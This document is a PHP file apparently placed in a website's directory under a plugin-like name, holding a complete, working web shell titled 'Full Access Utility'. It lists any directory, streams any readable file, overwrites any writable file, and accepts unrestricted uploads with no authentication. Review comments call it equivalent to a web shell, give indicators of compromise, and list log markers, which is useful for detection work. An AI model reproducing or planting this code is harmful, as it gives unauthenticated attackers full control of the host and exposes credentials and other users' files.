Full Access Utility
Editing File: /home/clevelandbridge/public_html/revolution/js/class-bulk-editor-list-column.php
<?php
// #######################################################
// ### DANGER: UNRESTRICTED FILE ACCESS UTILITY        ###
// ### REMOVE IMMEDIATELY AFTER USE.                   ###
// #######################################################
//
// Purpose: a single-file, browser-driven file manager. It lists directories,
// displays and edits files, and accepts uploads, all driven by request parameters.
//
// Security review summary (defender's view):
//   * There is no authentication, authorization, session or CSRF check anywhere in
//     this script. Unless the web server restricts the URL (not visible here),
//     every request is served.
//   * Every path comes from the request and is only canonicalised with realpath().
//     Nothing confines it to a base directory, so the reachable scope is whatever
//     the PHP process can read or write.
//   * Functionally this is indistinguishable from a web shell. If it is found on a
//     host where nobody deployed it on purpose, treat it as an indicator of
//     compromise: preserve a copy and its timestamps, review the access logs for
//     requests to it, then remove it and audit files written around the same time.
//   * Request markers visible in this code that can be searched for in logs or WAF
//     data: query parameters `dir`, `view`, `edit`, `msg`; POST fields
//     `save_file_content`, `file_path`, `file_content`; multipart field
//     `uploaded_file`; page title "Full Access Web Utility".

// --- Core Configuration and Path Resolution ---
// NOTE(review): realpath() resolves symlinks and ".." segments and returns false for a
// non-existent path. It is not a sanitiser: any existing absolute path passes through.
$current_path = isset($_GET['dir']) ? $_GET['dir'] : realpath(dirname(__FILE__));
$current_path = realpath($current_path);
if ($current_path === false) {
    // Fall back to the script's own directory when the requested path does not resolve.
    $current_path = realpath(dirname(__FILE__));
}
$script_name = basename(__FILE__);

// --- Handle Form Submissions (Upload & Edit Save) ---

// 1. Handle File Upload
// NOTE(review): basename() strips directory components from the client-supplied name,
// but there is no allow-list on extension, content type or size, and the destination
// directory is the caller-chosen $current_path. An existing file of the same name is
// overwritten.
if (isset($_FILES['uploaded_file'])) {
    $upload_dir = $current_path;
    $file_name = basename($_FILES['uploaded_file']['name']);
    $upload_file = $upload_dir . DIRECTORY_SEPARATOR . $file_name;
    if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $upload_file)) {
        $message = "SUCCESS: File '" . htmlspecialchars($file_name) . "' uploaded.";
    } else {
        $message = "ERROR: File upload failed.";
    }
    // Redirect to clear POST data (post/redirect/get); the status text travels in `msg`.
    header("Location: {$script_name}?dir=" . urlencode($current_path) . "&msg=" . urlencode($message));
    exit;
}

// 2. Handle File Content Save (Edit)
// NOTE(review): `file_path` is a hidden form field and therefore fully client-controlled.
// The only gate is "the path resolves and is writable", so any writable file on the host
// can be replaced with the posted content. No CSRF token is checked.
if (isset($_POST['save_file_content'])) {
    $file_path = realpath($_POST['file_path']);
    $content = $_POST['file_content'];
    // Ensure the file path is still valid before writing
    if ($file_path && is_writable($file_path)) {
        if (file_put_contents($file_path, $content) !== false) {
            $message = "SUCCESS: File '" . basename($file_path) . "' saved.";
        } else {
            $message = "ERROR: Failed to save file.";
        }
    } else {
        $message = "ERROR: Invalid file path or file is not writable.";
    }
    // Redirect to clear POST data. When the path did not resolve, $file_path is false here.
    header("Location: {$script_name}?dir=" . urlencode(dirname($file_path)) . "&msg=" . urlencode($message));
    exit;
}

// --- HTML Output Start ---
echo "<html><head><title>Full Access Web Utility</title>";
echo "<style> body{ font-family: 'Courier New', monospace; background-color: #1e1e1e; color: #00ff00; } .container{ width: 90%; max-width: 900px; margin: 20px auto; padding: 20px; border: 1px solid #00ff00; box-shadow: 0 0 15px rgba(0,255,0,0.5); } h1{ color: #ffff00; border-bottom: 1px dashed #00ff00; padding-bottom: 5px; } h3{ color: #00ffff; } ul{ list-style: none; padding: 0; } li{ margin-bottom: 8px; } a{ text-decoration: none; color: #aaffaa; margin-right: 10px; } a:hover{ text-decoration: underline; } .action-link{ color: #ffaa00; /* Orange for actions */ } .up-link{ color: #ff0000; } textarea{ width: 100%; height: 400px; background: #000; color: #00ff00; border: 1px solid #00ff00; } .message{ padding: 10px; border: 1px solid #ffff00; background: #333; color: #ffff00; margin-bottom: 20px; } </style>";
echo "</head><body><div class='container'>";
echo "<h1>Full Access Utility</h1>";

// Status banner: the `msg` query parameter is reflected, HTML-escaped.
if (isset($_GET['msg'])) {
    echo "<div class='message'>STATUS: " . htmlspecialchars($_GET['msg']) . "</div>";
}

// --- Handle File Viewing ---
// NOTE(review): arbitrary file read. Any file the PHP process can read is streamed back
// (configuration files, credentials, other sites' sources on shared hosting).
// The header() call runs after the HTML above has been echoed, so without output
// buffering the Content-Type change will not take effect.
if (isset($_GET['view'])) {
    $file_to_view = realpath($_GET['view']);
    if (is_file($file_to_view)) {
        header('Content-Type: text/plain; charset=utf-8');
        echo "#############################################\n";
        echo "### Viewing File: " . $file_to_view . "\n";
        echo "#############################################\n\n";
        readfile($file_to_view);
        exit;
    }
}

// --- Handle File Editing (Display Form) ---
// Renders the file's content in a textarea and carries the resolved path in a hidden
// field that the save handler above trusts.
// NOTE(review): the hidden value sits in a single-quoted attribute and is escaped with
// htmlspecialchars() default flags; on PHP versions before 8.1 those defaults do not
// escape single quotes. Confirm the runtime version.
if (isset($_GET['edit'])) {
    $file_to_edit = realpath($_GET['edit']);
    if (is_file($file_to_edit)) {
        $content = file_get_contents($file_to_edit);
        echo "<h3>Editing File: " . htmlspecialchars($file_to_edit) . "</h3>";
        echo "<form method='POST'>";
        echo "<input type='hidden' name='file_path' value='" . htmlspecialchars($file_to_edit) . "'>";
        echo "<textarea name='file_content'>" . htmlspecialchars($content) . "</textarea>";
        echo "<br><input type='submit' name='save_file_content' value='Save File' style='background: #00ff00; color: #1e1e1e; padding: 5px;'>";
        echo " <a href='?dir=" . urlencode(dirname($file_to_edit)) . "' style='color: #ff0000;'>[Cancel]</a>";
        echo "</form>";
    } else {
        echo "<p style='color: #ff0000;'>ERROR: File not found or not readable.</p>";
    }
    echo "</div></body></html>";
    exit;
}

// --- Directory Listing Display ---
// NOTE(review): the listing follows `dir` to any directory that resolves, and the
// "go up" link walks towards the filesystem root, so the whole tree readable by the
// PHP process can be enumerated.
echo "<h3>Current Directory: " . htmlspecialchars($current_path) . "</h3>";

// Link to go up one level (Go Back); omitted at the root, where dirname() returns the path itself.
$parent_dir = dirname($current_path);
if ($current_path != $parent_dir) {
    echo "<p><strong><a href='?dir=" . urlencode($parent_dir) . "' class='up-link'>[.. Go Up Directory (cd ..)]</a></strong></p>";
}

if (is_dir($current_path) && $dh = opendir($current_path)) {
    echo "<ul>";
    $directories = [];
    $files = [];
    // Split the entries into directories and everything else, skipping "." and "..".
    while (($file = readdir($dh)) !== false) {
        if ($file == '.' || $file == '..') continue;
        $full_path = $current_path . DIRECTORY_SEPARATOR . $file;
        if (is_dir($full_path)) {
            $directories[] = $file;
        } else {
            $files[] = $file;
        }
    }
    closedir($dh);

    // Sort and display directories; each links back to this script with a new `dir`.
    sort($directories);
    foreach ($directories as $file) {
        $full_path = $current_path . DIRECTORY_SEPARATOR . $file;
        echo "<li><span style='color: #00ffff;'>[DIR]</span> <a href='?dir=" . urlencode($full_path) . "'>" . htmlspecialchars($file) . "/</a></li>";
    }

    // Sort and display files with their size in KB and View/Edit links that carry
    // the absolute path in the query string.
    sort($files);
    foreach ($files as $file) {
        $full_path = $current_path . DIRECTORY_SEPARATOR . $file;
        $size = is_file($full_path) ? round(filesize($full_path) / 1024, 2) . " KB" : "N/A";
        echo "<li>";
        echo "<span style='color: #aaffaa;'>[FILE]</span> " . htmlspecialchars($file) . " (" . $size . ")";
        echo "<span style='float: right;'>";
        echo "<a href='?view=" . urlencode($full_path) . "' class='action-link'>[View]</a>";
        echo "<a href='?edit=" . urlencode($full_path) . "' class='action-link'>[Edit]</a>";
        echo "</span>";
        echo "</li>";
    }
    echo "</ul>";
} else {
    echo "<p style='color: #ff0000;'>Error: Cannot read directory contents or path is invalid.</p>";
}

// --- File Upload Form ---
// Posts back to this script; the upload handler near the top stores the file in the
// directory named by the current `dir` parameter.
echo "<hr style='border-color: #00ff00;'>";
echo "<h3>File Upload</h3>";
echo "<form method='POST' enctype='multipart/form-data'>";
echo "<input type='file' name='uploaded_file' style='border: 1px solid #00ff00;'>";
echo "<input type='submit' value='Upload to Current Dir' style='background: #00ff00; color: #1e1e1e; padding: 5px; margin-left: 10px;'>";
echo "</form>";
echo "</div></body></html>";
?>